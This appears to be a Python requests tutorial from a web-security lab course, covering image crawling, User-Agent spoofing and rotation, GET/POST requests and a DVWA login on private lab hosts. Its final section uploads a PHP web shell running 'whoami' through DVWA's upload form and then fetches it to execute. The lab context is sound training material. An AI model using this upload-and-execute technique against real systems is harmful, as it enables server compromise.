Writing a simple crawler script
Write a crawler script that:
uses the requests module to fetch the page content;
extracts the image addresses from the page content;
saves the images to files.
------------------------------------------------------------------------------------------------
First, fetch the page content
Modify the User-Agent header
Inspect the image file names
Build the full image addresses
Save the images to files
The script below walks through these steps:
import os
import re
import requests

# Site root; the image paths in the page are relative to this, not to index.html
base = "http://192.168.8.135/jianpan/"
url = base + "index.html"

def gohtml(url):
    # Fetch the page with a browser User-Agent so the request looks like a normal visit
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0"
    }
    res = requests.get(url=url, headers=headers)
    return res.text

def getjpg(html):
    # Extract relative image paths such as style/xxx.jpg (the dot is escaped so it matches literally)
    return re.findall(r"style/\w*\.jpg", html)

html = gohtml(url)
htt = getjpg(html)
os.makedirs("./jp", exist_ok=True)  # make sure the output directory exists
s = 0
for i in htt:
    res = requests.get(url=base + i)  # join the relative path onto the site root
    s += 1
    with open("./jp/{}.jpg".format(s), "wb") as f:
        f.write(res.content)
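If the image references on the page are not all simple style/xxx.jpg paths, urllib.parse.urljoin from the standard library is a more robust way to turn whatever relative path the HTML uses into a full URL. A minimal sketch against the same test host (the image name here is only illustrative):

from urllib.parse import urljoin

page_url = "http://192.168.8.135/jianpan/index.html"
# urljoin resolves a relative reference against the page URL,
# handling forms like style/a.jpg, ./style/a.jpg or /jianpan/style/a.jpg
print(urljoin(page_url, "style/01.jpg"))   # http://192.168.8.135/jianpan/style/01.jpg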
-------------------------------------------------------------------------------------------------
Practicing advanced usage of the requests module
Customizing the browser fingerprint
# 5.2高级.py
# Customize the browser fingerprint
import requests

url = "http://192.168.8.135/jianpan/"
headers = {
    "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
}
res = requests.get(url = url, headers = headers)
# Confirm which User-Agent was actually sent with the request
print(res.request.headers['User-Agent'])
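To make the fingerprint less predictable, the User-Agent can also be picked at random from a small pool for each request. A minimal sketch; the pool contents are just illustrative examples:

import random
import requests

url = "http://192.168.8.135/jianpan/"
# Illustrative pool of desktop browser User-Agent strings
ua_pool = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36",
]
headers = {"User-Agent" : random.choice(ua_pool)}
res = requests.get(url = url, headers = headers)
print(res.request.headers['User-Agent'])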
Sending GET parameters
Option 1: concatenate the parameters into the URL
import requests
url = "http://192.168.8.135/cms/show.php"
params = "?id=33"
fullUrl = url + params
res = requests.get(url = fullUrl)
print(res.text)
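Plain concatenation works for simple values; if a parameter contains spaces or special characters it should be URL-encoded first, for example with urllib.parse.urlencode. A minimal sketch (the extra q parameter is only illustrative):

import requests
from urllib.parse import urlencode

url = "http://192.168.8.135/cms/show.php"
# urlencode escapes spaces and special characters: id=33&q=a+b%26c
query = urlencode({"id" : "33", "q" : "a b&c"})
res = requests.get(url = url + "?" + query)
print(res.text)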
Option 2: use the params argument
import requests

url = "http://192.168.8.135/cms/show.php"
params = {
    'id' : '32'
}
res = requests.get(url = url, params = params)
print(res.text)
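With params, requests builds and URL-encodes the query string itself; the final URL that was requested can be checked through res.url. A short sketch:

import requests

url = "http://192.168.8.135/cms/show.php"
res = requests.get(url = url, params = {"id" : "32"})
print(res.url)   # http://192.168.8.135/cms/show.php?id=32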
Sending POST parameters
import requests

url = "http://192.168.8.137/dvwa/login.php"
headers = {
    "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
}
data = {
    "username" : "1337",
    "password" : "charley",
    "Login" : "Login"
}
res = requests.post(url = url, headers = headers, data = data)
print(res.text)
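A successful login comes back with a session cookie; rather than copying it into the headers by hand (as the upload example below does), a requests.Session can carry it across requests automatically. A minimal sketch under the same assumptions as above (DVWA at 192.168.8.137, login accepted without a CSRF token):

import requests

sess = requests.Session()
sess.headers.update({
    "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
})

login_url = "http://192.168.8.137/dvwa/login.php"
data = {"username" : "1337", "password" : "charley", "Login" : "Login"}

# The session stores any Set-Cookie from the response and resends it on later requests
res = sess.post(url = login_url, data = data)
print(sess.cookies.get_dict())

# Subsequent requests reuse the same PHPSESSID automatically
res = sess.get("http://192.168.8.137/dvwa/index.php")
print(res.status_code)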
File upload
import requests

url = "http://192.168.8.137/dvwa/vulnerabilities/upload/"
headers = {
    "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36",
    "Cookie" : "security=low; PHPSESSID=iuiris2tep6u7vhr4r4lgkatu3"
}
data = {
    "MAX_FILE_SIZE" : '100000',
    "Upload" : "Upload"
}
# files maps the form field name to (filename, file content, MIME type)
files = {
    "uploaded" : ("info.php", b"<? system(whoami)?>", "application/x-php")
}
res = requests.post(url = url, files = files, headers = headers, data = data)
# The success message sits inside a <pre> block; the slice strips the <pre> tag and the
# trailing " succesfully uploaded!" text, leaving the uploaded file's relative path
print(url + res.text[res.text.index("<pre>"):res.text.index("</pre>")][5:-22])
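The printed value combines the upload page URL with the relative path returned in the response; requesting it is a quick way to check that the uploaded PHP actually executes. A minimal sketch, where the URL is only illustrative and the short <? tag must be enabled on the server for the payload to run:

import requests

headers = {
    "Cookie" : "security=low; PHPSESSID=iuiris2tep6u7vhr4r4lgkatu3"
}
# Illustrative URL: use whatever the upload script printed above
shell_url = "http://192.168.8.137/dvwa/vulnerabilities/upload/../../hackable/uploads/info.php"
res = requests.get(url = shell_url, headers = headers)
# If the upload succeeded, the response should contain the output of the whoami command
print(res.text)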